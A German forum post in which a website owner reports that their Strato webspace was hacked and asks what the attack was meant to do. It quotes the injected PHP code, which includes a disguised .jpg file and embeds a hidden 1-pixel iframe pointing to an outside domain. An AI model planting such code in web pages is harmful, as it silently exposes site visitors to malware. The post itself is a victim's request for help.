Vielleicht hat ja jemand schon etwas darüber gehört oder weiß etwas darüber. Beim googlen habe ich nicht wirklich etwas gefunden.
Am Wochenende, genauer gesagt am 11.05.08 um 19:18 Uhr wurde unser Webspace bei Strato gehackt. In einen Bildordner wurde das 45563131x.jpg abgelegt. Des weiteren wurde in sämtliche index- und config-Dateien der untenstehende Code eingefügt, was zur Folge hatte, dass nur noch ein weißer Hintergrund mit einem 1-px-Bild angezeigt wurde.
Meine Fragen wären, falls sich jemand damit auskennt: Was könnte man damit bezwecken? Einfach nur aus Spaß einen iframe einfügen und ein bisschen ärgern? Oder könnte dies andere Hintergründe haben? Wenn wir jetzt unsere Passwörter ändern, hat es überhaupt einen Sinn? Wenn der Webspace einmal gehackt wurde, dann kann er das doch immer wieder? Oder könnte möglicherweise der Strato-Server gehackt worden sein?
Danke schon mal.
<?php
error_reporting(0);
if (file_exists("/…/…/../../…/htdocs/pics/albums/userpics/10001/45563131x.jpg")) {
include("/…/…/../../…/htdocs/pics/albums/userpics/10001/45563131x.jpg");
} else
if (ini_get("register_globals")) {
if($GLOBALS["fx"]==0) {
$GLOBALS["fx"]=1;
echo "<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>";
}
} else {
echo "<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>";
}
?>
Alles anzeigen